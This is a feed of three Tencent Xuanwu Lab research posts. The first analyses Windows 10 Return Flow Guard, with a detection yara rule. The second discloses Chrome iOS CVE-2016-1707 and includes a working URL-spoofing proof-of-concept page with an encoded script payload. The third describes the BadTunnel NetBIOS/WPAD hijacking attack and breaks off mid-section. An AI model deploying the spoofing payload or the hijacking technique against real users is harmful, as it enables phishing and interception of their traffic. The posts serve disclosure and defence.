Papers – Tencent's Xuanwu Lab
http://xlab.tencent.com/en
Wed, 21 Dec 2016 08:35:57 +0000

Return Flow Guard
http://xlab.tencent.com/en/2016/11/02/return-flow-guard/
Wed, 02 Nov 2016 06:29:27 +0000

[DannyWei, lywang, FlowerCode] of Tencent Xuanwu Lab

This is preliminary documentation of the RFG implementation. We will update it as we make new findings and corrections.

We analyzed the Return Flow Guard introduced in Windows 10 Redstone 2 14942, released on October 7, 2016.

1 PROTECTION METHODS

Microsoft introduced Control Flow Guard (CFG) in Windows 8.1 to protect against malicious modification of indirect call function pointers. CFG checks the target function pointer before each indirect call. However, CFG cannot detect modification of return addresses on the stack, and so cannot stop Return Oriented Programming (ROP).
The newly added Return Flow Guard (RFG) stops this kind of attack by saving the return address to fs:[rsp] at the entry of each function and comparing it with the return address on the stack before returning.
Enabling RFG requires both compiler and operating system support. During compilation, the compiler instruments the file by reserving space for the RFG instructions in the form of nop instructions.
When the target executable runs on a supported operating system, the reserved space is dynamically replaced with RFG instructions that check function return addresses. On an unsupported system, the nop instructions do not interfere with the normal execution flow of the program.
The difference between RFG and GS (Buffer Security Check) is that the GS stack cookie can be obtained through an information leak or brute force, whereas RFG writes the return address to the Thread Control Stack, out of the attacker's reach. This significantly increases the difficulty of an attack.

2 CONTROL SWITCHES

2.1 MMENABLERFG GLOBAL VARIABLE

This variable is controlled by a registry value located at:

\Registry\Machine\SYSTEM\CurrentControlSet\Control\Session Manager\kernel
EnableRfg : REG_DWORD

2.1.1 Initialization

KiSystemStartup -> KiInitializeKernel -> InitBootProcessor -> CmGetSystemControlValues

2.2 IMAGE FILE CONTROL FLAG

Control flags are stored in the IMAGE_LOAD_CONFIG_DIRECTORY64 structure in the PE file.
Flags in the GuardFlags field indicate RFG support status.

#define IMAGE_GUARD_RF_INSTRUMENTED                    0x00020000 // Module contains return flow instrumentation and metadata
#define IMAGE_GUARD_RF_ENABLE                          0x00040000 // Module requests that the OS enable return flow protection
#define IMAGE_GUARD_RF_STRICT                          0x00080000 // Module requests that the OS enable return flow protection in strict mode
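
As a small illustration, the three flag values above can be tested against a module's GuardFlags value. This is only a sketch and not part of the original analysis: the helper name describe_rfg_flags and the sample value are made up for the example.

```python
# Flag values copied from the #define lines above.
IMAGE_GUARD_RF_INSTRUMENTED = 0x00020000
IMAGE_GUARD_RF_ENABLE = 0x00040000
IMAGE_GUARD_RF_STRICT = 0x00080000


def describe_rfg_flags(guard_flags):
    """Return the names of the RFG-related bits set in a GuardFlags value."""
    names = []
    if guard_flags & IMAGE_GUARD_RF_INSTRUMENTED:
        names.append("RF_INSTRUMENTED")
    if guard_flags & IMAGE_GUARD_RF_ENABLE:
        names.append("RF_ENABLE")
    if guard_flags & IMAGE_GUARD_RF_STRICT:
        names.append("RF_STRICT")
    return names


# Hypothetical GuardFlags value: instrumented and enabled, but not strict.
print(describe_rfg_flags(0x00060000))
```

In practice the GuardFlags value would be read from the load configuration directory of the PE file under inspection.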

2.3 PROCESS CONTROL FLAG

2.3.1 Querying

The RFG status can be queried through the Win32 API GetProcessMitigationPolicy.

typedef enum _PROCESS_MITIGATION_POLICY {
// ...
    ProcessReturnFlowGuardPolicy = 11
// ...
} PROCESS_MITIGATION_POLICY, *PPROCESS_MITIGATION_POLICY;

2.3.2 Structure Definition

typedef struct _PROCESS_MITIGATION_RETURN_FLOW_GUARD_POLICY {
    union {
        DWORD Flags;
        struct {
            DWORD EnableReturnFlowGuard : 1;
            DWORD StrictMode : 1;
            DWORD ReservedFlags : 30;
        } DUMMYSTRUCTNAME;
    } DUMMYUNIONNAME;
} PROCESS_MITIGATION_RETURN_FLOW_GUARD_POLICY, *PPROCESS_MITIGATION_RETURN_FLOW_GUARD_POLICY;

3 NEW MEMBERS IN PORTABLE EXECUTABLE FORMAT

3.1 IMAGE_LOAD_CONFIG_DIRECTORY64

RFG-instrumented portable executables add several new fields, 24 bytes in total.

ULONGLONG  GuardRFFailureRoutine; 
ULONGLONG  GuardRFFailureRoutineFunctionPointer; 
DWORD      DynamicValueRelocTableOffset;
WORD       DynamicValueRelocTableSection;

Two pointers (16 bytes):
GuardRFFailureRoutine: virtual address of the _guard_ss_verify_failure function.
GuardRFFailureRoutineFunctionPointer: virtual address of the _guard_ss_verify_failure_fptr function pointer, which points to the _guard_ss_verify_failure_default function by default.

Information about the address table (6 bytes):
DynamicValueRelocTableOffset records the offset of the dynamic relocation table relative to the relocation table.
DynamicValueRelocTableSection records the section index of the dynamic value relocation table.
The remaining 2 bytes are reserved.

3.2 IMAGE_DYNAMIC_RELOCATION_TABLE

RFG instrumented portable executables have a new dynamic relocation table after the normal relocation table.

typedef struct _IMAGE_DYNAMIC_RELOCATION_TABLE {
    DWORD Version;
    DWORD Size;
//  IMAGE_DYNAMIC_RELOCATION DynamicRelocations[0];
} IMAGE_DYNAMIC_RELOCATION_TABLE, *PIMAGE_DYNAMIC_RELOCATION_TABLE;

typedef struct _IMAGE_DYNAMIC_RELOCATION {
    PVOID Symbol;
    DWORD BaseRelocSize;
//  IMAGE_BASE_RELOCATION BaseRelocations[0];
} IMAGE_DYNAMIC_RELOCATION, *PIMAGE_DYNAMIC_RELOCATION;

typedef struct _IMAGE_BASE_RELOCATION {
    DWORD   VirtualAddress;
    DWORD   SizeOfBlock;
//  WORD    TypeOffset[1];
} IMAGE_BASE_RELOCATION;

Symbol in IMAGE_DYNAMIC_RELOCATION indicates whether the stored entries are for function prologues or function epilogues. It is defined as follows:

#define IMAGE_DYNAMIC_RELOCATION_GUARD_RF_PROLOGUE 0x00000001
#define IMAGE_DYNAMIC_RELOCATION_GUARD_RF_EPILOGUE 0x00000002

The absolute address of an entry can be calculated from ImageBase + VirtualAddress + TypeOffset.
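
The address calculation can be sketched as follows. This is only an illustration: the helper name and sample values are hypothetical, and it assumes that the low 12 bits of each TypeOffset word hold the offset within the page, as in ordinary base relocations, which the analysis above does not confirm for this table.

```python
def entry_addresses(image_base, virtual_address, type_offsets):
    """Apply ImageBase + VirtualAddress + TypeOffset to each entry of one block."""
    # Assumption: only the low 12 bits are an offset (as in standard base relocations).
    return [image_base + virtual_address + (entry & 0x0FFF) for entry in type_offsets]


# Hypothetical block: page RVA 0x1000 with a single entry at offset 0x76C.
for address in entry_addresses(0x140000000, 0x1000, [0x076C]):
    print(hex(address))
```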

4 INSTRUCTION INSERTION

4.1 COMPILE TIME

4.1.1 Inserted Prologue Bytes (9 Bytes)

MiRfgNopPrologueBytes
xchg    ax, ax
nop     dword ptr [rax+00000000h]

4.1.2 Inserted Epilogue Bytes (Example, 15 Bytes)

retn
db 0Eh dup(90h)
retn

To reduce overhead, the compiler also inserts a _guard_ss_common_verify_stub function. Instead of inserting nop bytes at the end of every function, the compiler simply ends most functions with a jmp to this stub function. The stub contains the nop bytes that the kernel replaces with epilogue bytes at runtime, followed by a retn instruction at the end.

__guard_ss_common_verify_stub proc near
retn
db 0Eh dup(90h)
retn
__guard_ss_common_verify_stub endp

4.2 RUNTIME

MiPerformRfgFixups performs the instruction replacement according to the function information stored in IMAGE_DYNAMIC_RELOCATION_TABLE when a new executable section is created.

4.2.1 Replaced Prologue Bytes (9 Bytes)

The kernel uses MiRfgInstrumentedPrologueBytes to replace compiler inserted prologue bytes.

MiRfgInstrumentedPrologueBytes
mov     rax, [rsp]
mov     fs:[rsp], rax

4.2.2 Replaced Epilogue Bytes (15 Bytes)

The kernel uses MiRfgInstrumentedEpilogueBytes, together with the recorded address of the _guard_ss_verify_failure function, to replace the compiler-inserted epilogue bytes.

MiRfgInstrumentedEpilogueBytes
mov     r11, fs:[rsp]
cmp     r11, [rsp] 
jnz     _guard_ss_verify_failure
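
The replacement can be modelled in a few lines. The sketch below is a user-mode illustration, not the kernel's MiPerformRfgFixups logic: the function names and the check that a site still holds the nop pattern are assumptions, while the byte sequences are taken from the yara rule and WinDbg listings in section 6.

```python
import struct

# Byte sequences taken from the yara rule and WinDbg listings in this article.
NOP_PROLOGUE = bytes.fromhex("66900f1f8000000000")  # xchg ax, ax / nop dword ptr [rax+0]
RFG_PROLOGUE = bytes.fromhex("488b04246448890424")  # mov rax, [rsp] / mov fs:[rsp], rax
NOP_EPILOGUE = b"\xc3" + b"\x90" * 14               # retn followed by 14 nops
# mov r11, fs:[rsp] / cmp r11, [rsp] / jnz rel32 (opcode only, rel32 appended later)
RFG_EPILOGUE_HEAD = bytes.fromhex("644c8b1c244c3b1c240f85")


def build_epilogue(epilogue_va, failure_va):
    """Return the 15 instrumented bytes for an epilogue located at epilogue_va."""
    # The jnz displacement is relative to the end of the 15-byte sequence.
    rel32 = failure_va - (epilogue_va + 15)
    return RFG_EPILOGUE_HEAD + struct.pack("<i", rel32)


def apply_fixups(image, image_base, prologue_rvas, epilogue_rvas, failure_va):
    """Patch a bytearray in place, touching only sites that still hold the nop pattern."""
    for rva in prologue_rvas:
        if image[rva:rva + 9] == NOP_PROLOGUE:
            image[rva:rva + 9] = RFG_PROLOGUE
    for rva in epilogue_rvas:
        if image[rva:rva + 15] == NOP_EPILOGUE:
            image[rva:rva + 15] = build_epilogue(image_base + rva, failure_va)
    return image


# Stub address and failure routine address from the calc.exe listing in section 6.
print(build_epilogue(0x7FF791CA25BC, 0x7FF791CA26C0).hex())
```

Both replacements keep the original length (9 and 15 bytes), so the trailing retn of the epilogue stays in place and no other code has to move.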

5 THREAD CONTROL STACK

To implement RFG, Microsoft introduced the Thread Control Stack and reused the fs segment register on the x64 architecture. When an RFG-enabled process executes the mov fs:[rsp], rax instruction, the fs segment register points to the current thread’s ControlStackLimit on the control stack, and rax is written at offset rsp from it.
All user mode threads in a process use different memory blocks within the same Thread Control Stack. We can enumerate the virtual address descriptor (VAD) tree of the process to obtain the _MMVAD structure that describes the process’s Thread Control Stack.

    typedef struct _MMVAD {
      /* 0x0000 */ struct _MMVAD_SHORT Core;
      union {
        union {
          /* 0x0040 */ unsigned long LongFlags2;
          /* 0x0040 */ struct _MMVAD_FLAGS2 VadFlags2;
        }; /* size: 0x0004 */
      } /* size: 0x0004 */ u2;
      /* 0x0044 */ long Padding_;
      /* 0x0048 */ struct _SUBSECTION* Subsection;
      /* 0x0050 */ struct _MMPTE* FirstPrototypePte;
      /* 0x0058 */ struct _MMPTE* LastContiguousPte;
      /* 0x0060 */ struct _LIST_ENTRY ViewLinks;
      /* 0x0070 */ struct _EPROCESS* VadsProcess;
      union {
        union {
          /* 0x0078 */ struct _MI_VAD_SEQUENTIAL_INFO SequentialVa;
          /* 0x0078 */ struct _MMEXTEND_INFO* ExtendedInfo;
        }; /* size: 0x0008 */
      } /* size: 0x0008 */ u4;
      /* 0x0080 */ struct _FILE_OBJECT* FileObject;
    } MMVAD, *PMMVAD; /* size: 0x0088 */

    typedef struct _MMVAD_SHORT {
      union {
        /* 0x0000 */ struct _RTL_BALANCED_NODE VadNode;
        /* 0x0000 */ struct _MMVAD_SHORT* NextVad;
      }; /* size: 0x0018 */
      /* 0x0018 */ unsigned long StartingVpn;
      /* 0x001c */ unsigned long EndingVpn;
      /* 0x0020 */ unsigned char StartingVpnHigh;
      /* 0x0021 */ unsigned char EndingVpnHigh;
      /* 0x0022 */ unsigned char CommitChargeHigh;
      /* 0x0023 */ unsigned char SpareNT64VadUChar;
      /* 0x0024 */ long ReferenceCount;
      /* 0x0028 */ struct _EX_PUSH_LOCK PushLock;
      union {
        union {
          /* 0x0030 */ unsigned long LongFlags;
          /* 0x0030 */ struct _MMVAD_FLAGS VadFlags;
        }; /* size: 0x0004 */
      } /* size: 0x0004 */ u;
      union {
        union {
          /* 0x0034 */ unsigned long LongFlags1;
          /* 0x0034 */ struct _MMVAD_FLAGS1 VadFlags1;
        }; /* size: 0x0004 */
      } /* size: 0x0004 */ u1;
      /* 0x0038 */ struct _MI_VAD_EVENT_BLOCK* EventList;
    } MMVAD_SHORT, *PMMVAD_SHORT; /* size: 0x0040 */

    typedef struct _RTL_BALANCED_NODE {
      union {
        /* 0x0000 */ struct _RTL_BALANCED_NODE* Children[2];
        struct {
          /* 0x0000 */ struct _RTL_BALANCED_NODE* Left;
          /* 0x0008 */ struct _RTL_BALANCED_NODE* Right;
        }; /* size: 0x0010 */
      }; /* size: 0x0010 */
      union {
        /* 0x0010 */ unsigned char Red : 1; /* bit position: 0 */
        /* 0x0010 */ unsigned char Balance : 2; /* bit position: 0 */
        /* 0x0010 */ unsigned __int64 ParentValue;
      }; /* size: 0x0008 */
    } RTL_BALANCED_NODE, *PRTL_BALANCED_NODE; /* size: 0x0018 */

    typedef struct _RTL_AVL_TREE {
      /* 0x0000 */ struct _RTL_BALANCED_NODE* Root;
    } RTL_AVL_TREE, *PRTL_AVL_TREE; /* size: 0x0008 */

    typedef struct _EPROCESS {
        …
        struct _RTL_AVL_TREE VadRoot;
        …
    }

We can use _EPROCESS.VadRoot to walk through the VAD tree. If _MMVAD.Core.VadFlags.RfgControlStack flag is set, the current _MMVAD describes the virtual memory address range of the thread control stack (StartingVpn, EndingVpn, StartingVpnHigh, EndingVpnHigh in _MMVAD.Core), defined as follows:

    typedef struct _MMVAD_FLAGS {
      struct /* bitfield */ {
        /* 0x0000 */ unsigned long VadType : 3; /* bit position: 0 */
        /* 0x0000 */ unsigned long Protection : 5; /* bit position: 3 */
        /* 0x0000 */ unsigned long PreferredNode : 6; /* bit position: 8 */
        /* 0x0000 */ unsigned long NoChange : 1; /* bit position: 14 */
        /* 0x0000 */ unsigned long PrivateMemory : 1; /* bit position: 15 */
        /* 0x0000 */ unsigned long PrivateFixup : 1; /* bit position: 16 */
        /* 0x0000 */ unsigned long ManySubsections : 1; /* bit position: 17 */
        /* 0x0000 */ unsigned long Enclave : 1; /* bit position: 18 */
        /* 0x0000 */ unsigned long DeleteInProgress : 1; /* bit position: 19 */
        /* 0x0000 */ unsigned long PageSize64K : 1; /* bit position: 20 */
        /* 0x0000 */ unsigned long RfgControlStack : 1; /* bit position: 21 */ 
        /* 0x0000 */ unsigned long Spare : 10; /* bit position: 22 */
      }; /* bitfield */
    } MMVAD_FLAGS, *PMMVAD_FLAGS; /* size: 0x0004 */

    typedef struct _MI_VAD_EVENT_BLOCK {
      /* 0x0000 */ struct _MI_VAD_EVENT_BLOCK* Next;
      union {
        /* 0x0008 */ struct _KGATE Gate;
        /* 0x0008 */ struct _MMADDRESS_LIST SecureInfo;
        /* 0x0008 */ struct _RTL_BITMAP_EX BitMap;
        /* 0x0008 */ struct _MMINPAGE_SUPPORT* InPageSupport;
        /* 0x0008 */ struct _MI_LARGEPAGE_IMAGE_INFO LargePage;
        /* 0x0008 */ struct _ETHREAD* CreatingThread;
        /* 0x0008 */ struct _MI_SUB64K_FREE_RANGES PebTebRfg;
        /* 0x0008 */ struct _MI_RFG_PROTECTED_STACK RfgProtectedStack;
      }; /* size: 0x0038 */
      /* 0x0040 */ unsigned long WaitReason;
      /* 0x0044 */ long __PADDING__[1];
    } MI_VAD_EVENT_BLOCK, *PMI_VAD_EVENT_BLOCK; /* size: 0x0048 */

    typedef struct _MI_RFG_PROTECTED_STACK {
      /* 0x0000 */ void* ControlStackBase;
      /* 0x0008 */ struct _MMVAD_SHORT* ControlStackVad;
    } MI_RFG_PROTECTED_STACK, *PMI_RFG_PROTECTED_STACK; /* size: 0x0010 */
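
The VAD walk described above can be sketched as a filter over already-extracted VAD fields. This is a sketch under stated assumptions: the dictionaries stand in for values read with a kernel debugger, the sample numbers are hypothetical, and EndingVpn is assumed to name the last page of the range.

```python
RFG_CONTROL_STACK_BIT = 21  # bit position of RfgControlStack in _MMVAD_FLAGS


def vpn_to_va(vpn_low, vpn_high):
    """Combine the 32-bit VPN with its high byte, then convert pages to bytes."""
    return ((vpn_high << 32) | vpn_low) << 12


def control_stack_ranges(vads):
    """Yield (start_va, end_va) for every VAD whose RfgControlStack flag is set."""
    for vad in vads:
        if (vad["LongFlags"] >> RFG_CONTROL_STACK_BIT) & 1:
            start = vpn_to_va(vad["StartingVpn"], vad["StartingVpnHigh"])
            # Assumption: EndingVpn is the last page, so the range ends at its final byte.
            end = vpn_to_va(vad["EndingVpn"], vad["EndingVpnHigh"]) + 0xFFF
            yield start, end


# Hypothetical VAD entries: only the first one has the RfgControlStack bit set.
sample_vads = [
    {"LongFlags": 1 << 21, "StartingVpn": 0xF0000000, "StartingVpnHigh": 0x7,
     "EndingVpn": 0xF000000F, "EndingVpnHigh": 0x7},
    {"LongFlags": 0, "StartingVpn": 0x10, "StartingVpnHigh": 0,
     "EndingVpn": 0x1F, "EndingVpnHigh": 0},
]
for start, end in control_stack_ranges(sample_vads):
    print(hex(start), hex(end))
```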

When an RFG-protected thread is created, nt!MmSwapThreadControlStack sets the thread’s ETHREAD.UserFsBase. It uses MiLocateVadEvent to find the MMVAD from which UserFsBase is derived.
ETHREAD.UserFsBase is calculated with the following formula:

ControlStackBase = MMVAD.Core.EventList.RfgProtectedStack.ControlStackBase
ControlStackLimitDelta = ControlStackBase - (MMVAD.Core.StartingVpnHigh * 0x100000000 + MMVAD.Core.StartingVpn ) * 0x1000
ETHREAD.UserFsBase = ControlStackLimitDelta

Each thread has its own shadow stack range in the Thread Control Stack. If the current thread uses the range ControlStackBase ~ ControlStackLimit, then ControlStackLimit = KTHREAD.StackLimit + ControlStackLimitDelta. So the value actually stored in UserFsBase is the offset of ControlStackLimit from StackLimit. When multiple threads access the shadow stack simultaneously, each access actually lands at ETHREAD.UserFsBase + rsp.
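
The arithmetic above can be followed with a short sketch. The function names and all input values are hypothetical; the code only restates the formula given in this section and the fs:[rsp] addressing, wrapped to 64 bits.

```python
MASK64 = 0xFFFFFFFFFFFFFFFF


def control_stack_limit_delta(control_stack_base, starting_vpn, starting_vpn_high):
    """ControlStackBase minus the VAD start address, per the formula above."""
    vad_start = (starting_vpn_high * 0x100000000 + starting_vpn) * 0x1000
    return (control_stack_base - vad_start) & MASK64


def shadow_slot(user_fs_base, rsp):
    """Address touched by mov fs:[rsp], rax: segment base plus rsp, wrapped to 64 bits."""
    return (user_fs_base + rsp) & MASK64


# Hypothetical values, chosen only to make the arithmetic easy to follow.
delta = control_stack_limit_delta(0x7F0000010000, 0xF0000000, 0x7)
print(hex(delta), hex(shadow_slot(delta, 0x1000)))
```

Because the slot address depends on rsp, threads with different stacks reach different slots even though they run the same instrumented code.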

6 RFG IN ACTION

We wrote a simple yara signature to identify RFG-instrumented PE files.

rule rfg {
    strings:
        $pe = { 4d 5a }
        $a = { 66 90 0F 1F 80 00 00 00 00 }
        $b = { C3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 C3 }
        $c = { E9 ?? ?? ?? ?? 90 90 90 90 90 90 90 90 90 90 E9 }

    condition:
        $pe at 0 and $a and ($b or $c)
}

Usage:

yara64.exe -r -f rfg.yara %SystemRoot%
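
For readers without yara at hand, the same condition can be approximated in Python. This is a rough equivalent of the rule above rather than a replacement for it; the function name and the in-memory sample are made up for the example.

```python
import re

NOP_PROLOGUE = bytes.fromhex("66900f1f8000000000")             # $a
RET_EPILOGUE = b"\xc3" + b"\x90" * 14 + b"\xc3"                 # $b
JMP_EPILOGUE = re.compile(rb"\xe9.{4}\x90{10}\xe9", re.DOTALL)  # $c, ?? matches any byte


def looks_rfg_instrumented(data):
    """Mirror the rule condition: $pe at 0 and $a and ($b or $c)."""
    if not data.startswith(b"MZ"):
        return False
    if NOP_PROLOGUE not in data:
        return False
    return RET_EPILOGUE in data or JMP_EPILOGUE.search(data) is not None


# Synthetic buffer that only imitates the byte patterns; it is not a real PE file.
sample = b"MZ" + b"\x00" * 16 + NOP_PROLOGUE + RET_EPILOGUE
print(looks_rfg_instrumented(sample))
```

To scan a real file, read it in binary mode and pass the bytes to looks_rfg_instrumented.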

The output shows that most system executables in this version of Windows are already RFG instrumented.
Here we use IDA Pro and WinDbg to examine an RFG-instrumented calc.exe.

.text:000000014000176C wWinMain
.text:000000014000176C                 xchg    ax, ax
.text:000000014000176E                 nop     dword ptr [rax+00000000h]

The entry point before runtime replacement

0:000> u calc!wWinMain
calc!wWinMain:
00007ff7`91ca176c 488b0424        mov     rax,qword ptr [rsp]
00007ff7`91ca1770 6448890424      mov     qword ptr fs:[rsp],rax

The entry point after runtime replacement

.text:00000001400025BC __guard_ss_common_verify_stub
.text:00000001400025BC                 retn
.text:00000001400025BD                 db 0Eh dup(90h)
.text:00000001400025CB                 retn

The common verify stub function before runtime replacement

0:000> u calc!_guard_ss_common_verify_stub
calc!_guard_ss_common_verify_stub:
00007ff7`91ca25bc 644c8b1c24      mov     r11,qword ptr fs:[rsp]
00007ff7`91ca25c1 4c3b1c24        cmp     r11,qword ptr [rsp]
00007ff7`91ca25c5 0f85f5000000    jne     calc!_guard_ss_verify_failure (00007ff7`91ca26c0)
00007ff7`91ca25cb c3              ret

The common verify stub function after runtime replacement

7 REFERENCES

Exploring Control Flow Guard in Windows 10 Jack Tang, Trend Micro Threat Solution Team
http://sjc1-te-ftp.trendmicro.com/assets/wp/exploring-control-flow-guard-in-windows10.pdf

CVE-2016-1707 Chrome Address Bar URL Spoofing on IOS
http://xlab.tencent.com/en/2016/10/10/cve-2016-1707-chrome-address-bar-url-spoofing-on-ios/
Mon, 10 Oct 2016 03:18:36 +0000

This post describes an address bar URL spoofing vulnerability in Chrome for iOS (CVE-2016-1707), which I reported to Google in June 2016. A URL spoofing vulnerability lets an attacker display a forged, legitimate-looking website address in the address bar, and can therefore be exploited to launch phishing attacks.


Affected versions: Chrome < v52.0.2743.82, iOS < v10

0x01 Vulnerability Details

POC:

<script>

payload="PGJvZHk+PC9ib2R5Pg0KPHNjcmlwdD4NCiAgICB2YXIgbGluayA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2EnKTsNCiAgICBsaW5rLmhyZWYgPSAnaHR0cHM6Ly9nbWFpbC5jb206Oic7DQogICAgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChsaW5rKTsNCiAgICBsaW5rLmNsaWNrKCk7DQo8L3NjcmlwdD4=";

function pwned() {

    var t = window.open('https://www.gmail.com/', 'aaaa');
    t.document.write(atob(payload));
    t.document.write("<h1>Address bar says https://www.gmail.com/ - this is NOT https://www.gmail.com/</h1>");
}

</script>

<a href="https://hack.com::/"  target="aaaa" onclick="setTimeout('pwned()','500')">click me</a><br>

How does the vulnerability work? When the user clicks the ‘click me’ link, the browser opens a new window named aaaa and starts loading “https://hack.com::” in it; this address can be arbitrary. After 500 milliseconds, pwned() runs and opens ‘https://www.gmail.com/’ in the aaaa window; this URL can also be empty. Up to this point everything behaves normally. The code that follows is the core that triggers the vulnerability.

base64 payload code:

<body></body>
<script>
    var link = document.createElement('a');
    link.href = 'https://gmail.com::';
    document.body.appendChild(link);
    link.click();
</script>

The aaaa window then begins loading ‘https://gmail.com::’. Fortunately for the attacker, Chrome allows this load to start and records the address as a pending entry. Because ‘https://gmail.com::’ is an invalid address, I think Chrome should navigate to about:blank. Instead, Chrome commits the pending entry (‘https://gmail.com::’) and promotes it to the last committed URL. At this point the loading process is complete, and a perfect URL spoofing vulnerability is born.
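
The base64 payload from the POC can be checked by decoding it, which is a quick way to confirm that it contains exactly the script discussed above. The snippet below is only a verification aid and is not part of the original POC.

```python
import base64

# Payload string copied verbatim from the POC above.
payload = (
    "PGJvZHk+PC9ib2R5Pg0KPHNjcmlwdD4NCiAgICB2YXIgbGluayA9IGRvY3VtZW50LmNyZWF0"
    "ZUVsZW1lbnQoJ2EnKTsNCiAgICBsaW5rLmhyZWYgPSAnaHR0cHM6Ly9nbWFpbC5jb206Oic7"
    "DQogICAgZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChsaW5rKTsNCiAgICBsaW5rLmNsaWNr"
    "KCk7DQo8L3NjcmlwdD4="
)

# atob() in the POC performs the same decoding inside the browser.
decoded = base64.b64decode(payload).decode("ascii")
print(decoded)
```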

Online demo:

http://xisigr.com/test/spoof/chrome/1.html

http://xisigr.com/test/spoof/chrome/2.html

0x02 Fix

[IOS] Do not commit invalid URLs during web load.

   [self optOutScrollsToTopForSubviews];

   // Ensure the URL is as expected (and already reported to the delegate).
-  DCHECK(currentURL == _lastRegisteredRequestURL)
+  // If |_lastRegisteredRequestURL| is invalid then |currentURL| will be
+  // "about:blank".
+  DCHECK((currentURL == _lastRegisteredRequestURL) ||
+         (!_lastRegisteredRequestURL.is_valid() &&
+          _documentURL.spec() == url::kAboutBlankURL))
       << std::endl
       << "currentURL = [" << currentURL << "]" << std::endl
       << "_lastRegisteredRequestURL = [" << _lastRegisteredRequestURL << "]";

   // This is the point where the document's URL has actually changed, and
   // pending navigation information should be applied to state information.
   [self setDocumentURL:net::GURLWithNSURL([_webView URL])];
-  DCHECK(_documentURL == _lastRegisteredRequestURL);
+
+  if (!_lastRegisteredRequestURL.is_valid() &&
+      _documentURL != _lastRegisteredRequestURL) {
+    // if |_lastRegisteredRequestURL| is an invalid URL, then |_documentURL|
+    // will be "about:blank".
+    [[self sessionController] updatePendingEntry:_documentURL];
+  }
+  DCHECK(_documentURL == _lastRegisteredRequestURL ||
+         (!_lastRegisteredRequestURL.is_valid() &&
+          _documentURL.spec() == url::kAboutBlankURL));
+
   self.webStateImpl->OnNavigationCommitted(_documentURL);
   [self commitPendingNavigationInfo];
   if ([self currentBackForwardListItemHolder]->navigation_type() ==

0x03 Disclosure Timeline

2016/6/22 Reported to Google, https://bugs.chromium.org/

2016/6/22 Google assigned Security_Severity-High

2016/7/14 Google awarded a $3000 reward

2016/7/20 Google advisory disclosed, CVE-2016-1707

2016/10/2 Google made the issue fully public

0x04 References

[1] https://googlechromereleases.blogspot.com/2016/07/stable-channel-update.html

[2] https://bugs.chromium.org/p/chromium/issues/detail?id=622183

[3] https://chromium.googlesource.com/chromium/src/+/5967e8c0fe0b1e11cc09d6c88304ec504e909fd5

BadTunnel – A New Hope
http://xlab.tencent.com/en/2016/06/17/badtunnel-a-new-hope/
Fri, 17 Jun 2016 08:20:27 +0000

This article proposes a new attack model, named “BadTunnel”, for hijacking TCP/IP broadcast protocols across different network segments.

With this method, NetBIOS Name Service spoofing can be achieved regardless of whether the attacker and the victim are on the same network, and regardless of any firewalls and NAT devices in between. All it needs is for the victim to navigate to a malicious web page with IE or Edge, or to open a specially crafted document. The attacker can then hijack the victim’s NetBIOS name queries and pose as a print server or file server in the local network.

By hijacking the WPAD name, the attacker can hijack all network communications, including but not limited to ordinary web access, the Windows Update service, and Microsoft Crypto API certificate revocation list updates. Once the hijack succeeds, it is easy to execute arbitrary programs on the target system by using Evilgrade [1].

This method is effective on all Windows versions before the June 2016 patch. It can be exploited through all versions of Internet Explorer, Microsoft Edge, and Microsoft Office, as well as through third-party applications. In fact, the BadTunnel attack can be conducted anywhere a file URI scheme or UNC path can be embedded. For example, if a shortcut’s icon path points to a malicious file URI or UNC path, the attack is triggered the moment the user sees the shortcut in Windows Explorer. This means BadTunnel can also be exploited through web pages, emails, USB flash drives, and many other channels. It can even affect web servers and SQL servers [2].

(This article does not include everything covered by the BadTunnel research. The remaining part will be released in my presentation “BadTunnel: How do I get Big Brother power” at Black Hat USA 2016.)

0x00 Background

NetBIOS is an ancient protocol. In 1987, the IETF released RFC 1001 and RFC 1002, which define NetBIOS over TCP/IP, or NBT for short. NetBIOS includes three services; one of them is the name service NetBIOS-NS, or NBNS for short. NBNS can resolve local names by broadcasting in the LAN.

When trying to access \\Tencent\XuanwuLab\tk.txt, NBNS sends an NBNS NB query to the broadcast address:

Who is “Tencent”?

Any host in LAN can respond to this request:

“Tencent” is at 192.168.2.9.

The victim’s computer then accepts this response and tries to access \\192.168.2.9\XuanwuLab\tk.txt.

This mechanism is definitely not safe, but since the LAN is usually treated as a trusted network, this spoofing possibility is not considered a vulnerability, just like ARP spoofing.

WPAD (Web Proxy Auto-Discovery Protocol) is another ancient protocol, with over 20 years of history. As the name suggests, it is used to automatically discover and configure the system proxy. Almost all operating systems support WPAD, but only Windows enables it by default. According to this protocol, Windows tries to access http://WPAD/wpad.dat to retrieve the proxy configuration script.

On Windows, the name “WPAD” is resolved by NBNS. As previously stated, any host in a LAN can claim to be “WPAD”. This is not secure but acceptable, since the LAN is considered a trusted network environment. Although WPAD hijacking was discovered more than a decade ago and was used by the Flame worm, it is not considered a security vulnerability, just like ARP spoofing.
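
For reference, a name such as WPAD does not travel as plain text in an NBNS packet. RFC 1001 pads it to 16 bytes and spreads each byte over two letters (first-level encoding). The sketch below illustrates that encoding; the function name is made up, and the 0x00 suffix byte is an assumption chosen for the example.

```python
def encode_netbios_name(name, suffix=0x00):
    """First-level encode a NetBIOS name (RFC 1001): 16 bytes become 32 letters A-P."""
    # Pad the upper-cased name to 15 bytes with spaces, then append the suffix byte.
    raw = name.upper().encode("ascii")[:15].ljust(15, b" ") + bytes([suffix])
    # Each byte is split into two nibbles, and 'A' (0x41) is added to each nibble.
    return "".join(chr(0x41 + (b >> 4)) + chr(0x41 + (b & 0x0F)) for b in raw)


print(encode_netbios_name("WPAD"))
```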

NBNS is implemented on top of UDP, which is a connectionless protocol. Firewalls, NAT devices, and other network devices cannot tell which session a UDP packet belongs to, so they must allow UDP packets in both directions.

An NBNS name query is broadcast, but like most other broadcast protocols, NBNS accepts responses from outside the network segment. This means that if 192.168.2.2 sends a request to 192.168.2.255 and 10.10.10.10 responds in time, the response will be accepted by 192.168.2.2. In some enterprise networks, this is required by the network topology.

0x01 Implementation

If we send a fake response from outside the network segment while NBNS is performing a name query, the response can still be accepted. Therefore, NBNS spoofing across network segments is possible, but there are a few problems:

  1. Most hosts have a firewall enabled, which makes it impossible to send data to the host. Even without a firewall, there is no way to send data directly from the internet to an intranet. Does that mean we can only perform NBNS spoofing against systems that have a public IP address and no firewall enabled?
  2. A DNS look-alike protocol is encapsulated within NBNS, so it also includes a Transaction ID. Only packets with a matching Transaction ID are accepted.
